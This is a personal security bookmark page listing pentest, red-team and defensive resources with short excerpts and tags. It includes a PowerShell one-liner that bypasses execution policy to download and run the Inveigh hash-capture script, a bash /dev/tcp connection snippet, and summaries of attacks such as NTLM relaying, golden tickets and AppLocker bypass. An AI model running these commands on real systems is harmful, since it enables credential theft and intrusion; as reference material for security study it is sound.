whip_lash + security   555

RedTeam_CheatSheet.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
yesterday by whip_lash
Categorizing and Enriching Security Events in an ELK with the Help of Sysmon and ATT&CK
Thanks to the recent update to Sysmon (Version 8.0), tagging Sysmon rules is now possible, and makes things much easier to add extra metadata to Sysmon events.
sysmon  security  monitoring 
7 days ago by whip_lash
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
Pv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
7 days ago by whip_lash
Car Hacking: The definitive source
Instead of buying books or paying exorbitant amount of money to learn about car hacking, we (Charlie Miller and Chris Valasek) decided to publish all our tools, data, research notes, and papers to everyone for FREE! Feel free to reach out if you have any questions. If you're nice enough we may actually send you one of our IDBs ;)
car  hacking  security 
8 days ago by whip_lash
Netflix/security_monkey: Security Monkey
Security Monkey monitors your AWS and GCP accounts for policy changes and alerts on insecure configurations. Support is available for OpenStack public and private clouds. Security Monkey can also watch and monitor your GitHub organizations, teams, and repositories.
aws  devops  github  monitoring  security 
11 days ago by whip_lash
Hexacorn | Blog
If you run ‘powershell <0x2000 spaces> calc’ you will spawn Windows Calculator.

What will you see in the logs?

This:

JUST A POWERSHELL COMMANDLINE
obfuscation  logging  pentest  windows  security 
15 days ago by whip_lash
InitString / evil-ssdp · GitLab
Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page.
ssdp  upnp  security  pentest  github 
15 days ago by whip_lash
Bypassing SQL Server Logon Trigger Restrictions
Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties.
database  pentest  security  mssql  MySQL  sql 
15 days ago by whip_lash
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
hash  ntlm  relay  windows  pentest  security 
16 days ago by whip_lash
SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec at http://pen-testing.sans.org/blog/2013/03/27/psexec-python-rocks) It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!
impacket  python  security  smb  relay  ntlm  hash  script  pentest 
16 days ago by whip_lash
calebmadrigal/trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.
network  python  security  wifi  wireless  pentest  github 
16 days ago by whip_lash
ufrisk/pcileech: Direct Memory Access (DMA) Attack Software
PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.

PCILeech works without hardware together with memory dump files and the Windows 7/2008R2 x64 Total Meltdown / CVE-2018-1038 vulnerability.
memory  security  github  hardware 
16 days ago by whip_lash
Homas/ioc2rpz: ioc2rpz is a place where threat intelligence meets DNS.
ioc2rpz transforms IOC feeds into response policy zones (RPZ). You can mix feeds to generate a single RPZ or multiple RPZs. Trusted domains and IPs can be whitelisted. ioc2rpz supports expiration of indicators and accordingly rebuilds zones.
dns  security  github 
16 days ago by whip_lash
Cymmetria/honeycomb: An extensible honeypot framework
Honeycomb is an open-source honeypot framework created by Cymmetria.

Honeycomb allows running honeypots with various integrations from a public library of plugins from https://github.com/Cymmetria/honeycomb_plugins

Writing new honeypot services and integrations for honeycomb is super easy! See the plugins repo for more info.
honeypot  security  github 
16 days ago by whip_lash
jzadeh/chiron-elk
CHIRON is a home analytics based on ELK stack combined with Machine Learning threat detection framework AKTAION. CHIRON parses and displays data from P0f, Nmap, and BRO IDS. CHIRON is designed for home use and will give great visibility into home internet devices (IOT, Computers, Cellphones, Tablets, etc).
github  lab  security  securityonion 
16 days ago by whip_lash
sense-of-security/ADRecon: ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
security  pentest  activedirectory  github 
16 days ago by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks | SANS Institute
Favorite tweet:

SANS | #PenTest Blog

Modern Web App Pen Testing Part 2, Hash Length Extension Attacks
by @adriendb (SEC642)

Blog: https://t.co/8TR2Z7OKYu pic.twitter.com/3YA3ncesym

— SANS Pen Test (@SANSPenTest) June 28, 2018
hashextension  hash  webapp  pentest  security 
16 days ago by whip_lash
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI – Security Stuff
earning from these incidents, and the requirements inherent to them (ability to deploy tools and get data rapidly, use only built in tools, has to be usable and deployable by people who probably haven't slept in a week) I developed an Incident Response dashboard that I liked so much I personally used it to "hunt" on all the engagements in the later part of my Incident Response Consultant tenure. Many of the customers liked it so much that they have kept it in their environments to use for proactive threat hunting and log analysis.
defense  dfir  security  windows 
18 days ago by whip_lash
Microsoft COM for Windows - Privilege Escalation
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
 
privesc  windows  pentest  exploit  security 
20 days ago by whip_lash
Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses | McAfee Blogs
In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.
pentest  security 
24 days ago by whip_lash
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
The "executive summary" version of a Golden Ticket is that if you can obtain one of the encryption keys used by the krbtgt account for an Active Directory domain, Mimikatz 2.0 will allow you to forge arbitrary Kerberos authentication tickets for that domain. Those keys are not easily-obtained — unless someone has left an NTDS.DIT backup lying around, it probably requires access to a domain admin account's credentials — so the Golden Ticket functionality is sort of like the "New Game+" mode in the Silent Hill series: you've already won, and now you can play through again as an unstoppable juggernaut with a laser pistol and/or chainsaw.
activedirectory  mimikatz  goldenticket  pentest  security 
24 days ago by whip_lash
One-Lin3r v1.1 - Gives You One-Liners That Aids In Penetration Testing Operations - KitPloit - PenTest Tools for your Security Arsenal ☣
Favorite tweet:

#OneLin3r v1.1 - Gives You One-Liners That Aids In Penetration #Testing Operations https://t.co/AWvpLnt1ND pic.twitter.com/74zGjoV9Ve

— ☣ The Hacker Tools (@KitPloit) June 14, 2018
pentest  security  tool 
28 days ago by whip_lash
Pentester's Windows NTFS Tricks Collection | SEC Consult
Moreover, it’s possible that an administrator or a program configures such permissions and assumes that users are really not allowed to create folders in it.

This ACL can be bypassed as soon as a user can create files. Adding “::$INDEX_ALLOCATION” to the end of a filename will create a folder instead of a file and Windows currently doesn’t include a check for this corner case.

As shown above, a directory was successfully created and the user can create arbitrary files or folders in this directory (which can lead to privilege escalation if an administrator/program assumes that this is not possible because of the missing permissions).
ntfs  windows  privesc  privilegeescalation  security  whitelist-evasion 
4 weeks ago by whip_lash
rmikehodges/hideNsneak
This application assists in managing attack infrasturcture by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls.
github  cloud  pentest  security 
5 weeks ago by whip_lash
Introducing Merlin — A cross-platform post-exploitation HTTP/2 Command & Control Tool
tl;dr Evade network detection during a penetration test/red team exercise by using a protocol that existing tools aren’t equipped to understand or inspect.
security  pentest  c2  c&c  merlin 
7 weeks ago by whip_lash
Ne0nd0g/merlin: Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
Download the latest version of Merlin Server from the releases section
Extract the files with 7zip using the x function. The password is: merlin
Start Merlin
Deploy an agent. See Agent Execution Quick Start Guide for examples
Pwn, Pivot, Profit
agent  c2  c&c  merlin  github  pentest  security 
7 weeks ago by whip_lash
f0rb1dd3n/Reptile: LKM Linux rootkit
Give root to unprivileged users
Hide files and directories
Hide files contents
Hide processes
Hide himself
Hidden boot persistence
ICMP/UDP/TCP port-knocking backdoor
Full TTY/PTY shell with file transfer
Client to handle Reptile Shell
kernel  linux  security 
7 weeks ago by whip_lash
Extracting SSH Private Keys from Windows 10 ssh-agent
Favorite tweet:

New blogpost: extracting unencrypted private SSH keys from Windows 10's new builtin ssh-agent service

Had some fun this weekend playing with the new OpenSSH utilities on Windows 10. Might be useful for pentesters/redteamers :)https://t.co/Xn47rTfVQc

— Ronnie Flathers (@ropnop) May 20, 2018
security  ssh  pentest 
7 weeks ago by whip_lash
!exploitable Crash Analyzer - MSEC Debugger Extensions - CodePlex Archive
The tool first creates hashes to determine the uniqueness of a crash and then assigns an exploitability rating to the crash: Exploitable, Probably Exploitable, Probably Not Exploitable, or Unknown.
security  Microsoft  debugger  windbg  exploit  development 
9 weeks ago by whip_lash
Advanced Web Shell (Full Sources) : netsec
There's multiple things that makes DAws better than every Web Shell out there
webshell  webapp  pentesting  security 
9 weeks ago by whip_lash
Lab of a Penetration Tester: Silently turn off Active Directory Auditing using DCShadow
One very interesting thing which I recently discovered is the ability to DCShadow to modify System Access Control List or SACL. When we enable auditing on success or failure on an AD object, an entry (called ACE - Access Control Entry) is added to the SACL of that object. The permissions to an object are controlled by a DACL. For example, we modified DACL of AdminSDHolder in the previous post for persistence.
activedirectory  pentest  security  dcshadow 
10 weeks ago by whip_lash
Escalating privileges with ACLs in Active Directory | Fox-IT International blog
This blogpost describes a scenario where our standard attack methods did not
work and where we had to dig deeper in order to gain high privileges in the domain.
We describe more advanced privilege escalation attacks using Access Control Lists
and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx
that automate the steps for this advanced attack.
activedirectory  windows  pentest  privilegeescalation  security 
11 weeks ago by whip_lash
Malicious Network Traffic From /bin/bash - SANS Internet Storm Center
exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
cat <&5
exec 5>&-
bash  c2  networking  hacking  pentest  security  linux  postexploitation 
11 weeks ago by whip_lash
How to prevent bypassing AppLocker using Alternate Data Streams – Gunnar Haslinger
So, what’s the trick to bypass AppLocker: We copy the contents of an executable to an Alternate Data Stream of the logs-directory. To be clear: Not to a file in the logs-directory, but to an ADS of the logs-directory itself! The copy-job is done using the “type” command redirecting the output to an ADS. The execution of an ADS can be done by various ways, one way would be to use wmic to create a new process, but there are other ways too.
pentest  security  windows  postexploitation  whitelist-evasion 
12 weeks ago by whip_lash
bohops on Twitter: "Is Explorer.exe the ultimate #lolbin? explorer.exe [exe/hta/scr/...etc] *Invokes child processes when called (after a lookup of the the default program handler) *Hides from the default filter in AutoRuns *Just might be doing a little m
Favorite tweet:

Is Explorer.exe the ultimate #lolbin?

explorer.exe [exe/hta/scr/...etc]

*Invokes child processes when called (after a lookup of the the default program handler)
*Hides from the default filter in AutoRuns
*Just might be doing a little more on a workstation in your network#DFIR pic.twitter.com/3YmafQmkqs

— bohops (@bohops) April 19, 2018
Twitter  pentest  security  windows  postexploitation  whitelist-evasion 
12 weeks ago by whip_lash
GitHub - api0cradle/LOLBAS: Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Favorite tweet:

A good documentation on all the different #LOLBins and #LOLScripts would be nice? Right?

Good thing I have started then. Still have a lot of notes to add, but I feel this is a good start. Would love community feedback and contributions.

Is this useful?https://t.co/fGjsX76BEH pic.twitter.com/oYPhvDdGyq

— Oddvar Moe [MVP] (@Oddvarmoe) April 19, 2018
Twitter  pentest  security  livingofftheland  whitelist-evasion  postexploitation  windows 
12 weeks ago by whip_lash
Securing DNS across all of my devices with Pi-Hole + DNS-over-HTTPS + 1.1.1.1
Of course you can't simply use this as a DNS resolver, you need something to sit in the middle and speak DNS to your clients and DoH to a provider upstream that answer DoH queries. For that I'm going to use a Pi-Hole and get some extra bang for my buck.
dns  privacy  security 
april 2018 by whip_lash
Dumping Clear-Text Credentials | Penetration Testing Lab
The article contains Windows locations where passwords might exist and techniques to retrieve them.
passwords  windows  security  pentest  postexploitation 
april 2018 by whip_lash
OS Command Injection; The Pain, The Gain - Black Hills Information Security
I was confused. I definitely had command injection but nothing was working. I finally figured out that the command length was limited to 32 characters, likely because it was being written to a database first. I discovered this by sending the ping command over and over again with varying numbers of spaces until it stopped working.
security  commandinjection  pentest 
march 2018 by whip_lash
GitHub - eladshamir/Internal-Monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Mimikatz
The Internal Monologue Attack flow is described below:

Disable NetNTLMv1 preventive controls by changing LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic to appropriate values, as described above.
Retrieve all non-network logon tokens from currently running processes and impersonate the associated users.
For each impersonated user, interact with NTLM SSP locally to elicit a NetNTLMv1 response to the chosen challenge in the security context of the impersonated user.
Restore the original values of LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic.
Crack the NTLM hash of the captured responses using rainbow tables.
Pass the Hash.
hash  postexploitation  pentest  security  github 
march 2018 by whip_lash
Top Five Ways I gained access to Your Corporate Wireless Network (Lo0tBo0ty KARMA edition)
I’ve been able to snag credentials for EAP and TTLS networks ,where other Evil Twins fail. A set of valid user credentials can allow privilege escalation and persistence that can take a red team sometimes week to establish.
wireless  pentest  security 
march 2018 by whip_lash
Introducing Metta: Uber’s Open Source Tool for Adversarial Simulation
Today, Uber announced the open-source release of Metta, a tool for basic adversarial simulation. Modern software techniques such as end-to-end functional testing and test-driven development work well for software design, and these same techniques can be applied to detection systems. In fact, Metta was born from multiple internal projects where we’d already brought DevOps concepts to our detection rules.
devops  hacking  opensource  security  purpleteam  metta 
march 2018 by whip_lash
Analysis of a Kubernetes hack — Backdooring through kubelet
There are two ports that kubelet listens on, 10255 and 10250. The former is a read only HTTP port and the latter is an HTTPS port that can essentially do whatever you want.
containers  kubernetes  security 
march 2018 by whip_lash
« earlier      
per page:    204080120160

related tags

2fa  activedefense  activedirectory  afghanistan  agent  aircraft  analysis  android  ansible  antivirus  api  app  apple  apps  apt  ascii  assembly  austin  authentication  aws  banking  base64  bash  bigbrother  binary  biology  bitcoin  blogs  bloodhound  board  book  books  Brazil  britain  browser  bruteforce  bufferoverflow  bug  bugbounty  burp  c  c&c  c++  c2  car  career  cars  certification  cheatsheet  cheatsheets  china  cis  cisco  cissp  class  cloud  code  coldfusion  commandinjection  communications  compliance  compromise  conference  consulting  containers  conversion  courses  crackmapexec  craigslist  creepy  crime  crypto  cryptography  ctf  culture  darkweb  data  database  dcshadow  ddos  debugger  debugging  defcon  defense  deserialization  design  development  devops  dfir  diamond  dictionary  disassembler  diy  dns  docker  domain  dos  download  drive  drm  economics  education  egypt  elasticsearch  electricity  electronics  elkstack  email  encryption  engineering  enumeration  espionage  ethereum  ethics  evasion  events  exchange  exfiltration  exploit  facebook  fbi  firewall  foreignpolicy  forensics  forum  fraud  free  freebsd  freeware  fuzzing  gadgets  games  gigs  github  glba  goldenticket  google  government  gps  guide  hacking  hardening  hardware  hash  hashcat  hashes  hashextension  hex  hipaa  honeypot  howto  hping3  html  http  https  humor  i2p  ibm  ichidan  icmp  ida  idiocracy  ids  iis  immunity  impacket  india  indicators  infraguard  injection  intel  intelligence  internet  intrusionanalysis  ios  iot  iphone  ips  ipsec  ipv6  java  javascipt  javascript  jenkins  joke  juniper  kali  keepass  kerberoast  kerberos  kernel  kubernetes  lab  laps  law  learning  lemons  lfi  library  linux  literature  livingofftheland  localadmin  lockpicking  logging  lotusnotes  mac  mainframe  malware  memory  merlin  messaging  metasploit  metta  mexico  mfa  microsoft  military  mimikatz  mindmap  mitm  mobile  monitoring  moonlighting  mssql  music  MySQL  netcat  netripper  networengineering  network  networking  news  nmap  nsa  ntfs  ntlm  obama  obfuscation  office  online  openbsd  opensource  opsec  oscp  osint  outlook  p2p  packetcapture  passports  Password  passwords  pcap  pdf  pentest  pentesting  pgp  php  phy  physical  pivoting  plugin  police  politics  postexploitation  postscript  powershell  privacy  privesc  privilegeescalation  privitization  programming  promiscuous  proxcard  proxy  psychology  purpleteam  python  radio  rails  rdp  recommended  recon  redis  redteam  reference  registry  relay  report  resources  responder  rest  reverseengineering  reverseshell  rfi  rmi  router  ruby  sanbox  sans  sarbanes-oxley  scanner  schneier  science  script  Scripting  sdn  sdr  search  secrecy  secure  security  securityonion  sensepost  server  services  shell  shellcode  shodan  siem  sign  signature  smb  smtp  socks  software  solaris  spam  spike  splunk  sql  sqli  ssdp  ssh  ssl  ssrf  stealth  sudo  swift  sysadmin  sysinternals  sysmon  taliban  tcp  tech  technology  terrorism  testing  tips  tool  tools  tor  torrent  training  transportation  travel  troubleshooting  tty  tutorial  tutorials  twitter  uac  ubuntu  unicornscan  unix  upnp  urldecode  usb  utilities  video  virtualization  vmware  voip  vpn  vulnerability  waf  war  wargames  web  webapp  webdav  webdev  webshell  whitelist-evasion  wifi  windbg  windows  wireless  wireshark  wordpress  workstation  wpad  wps  xml  xss  xxe  yara  youtube  yubikey 

Copy this bookmark:



description:


tags: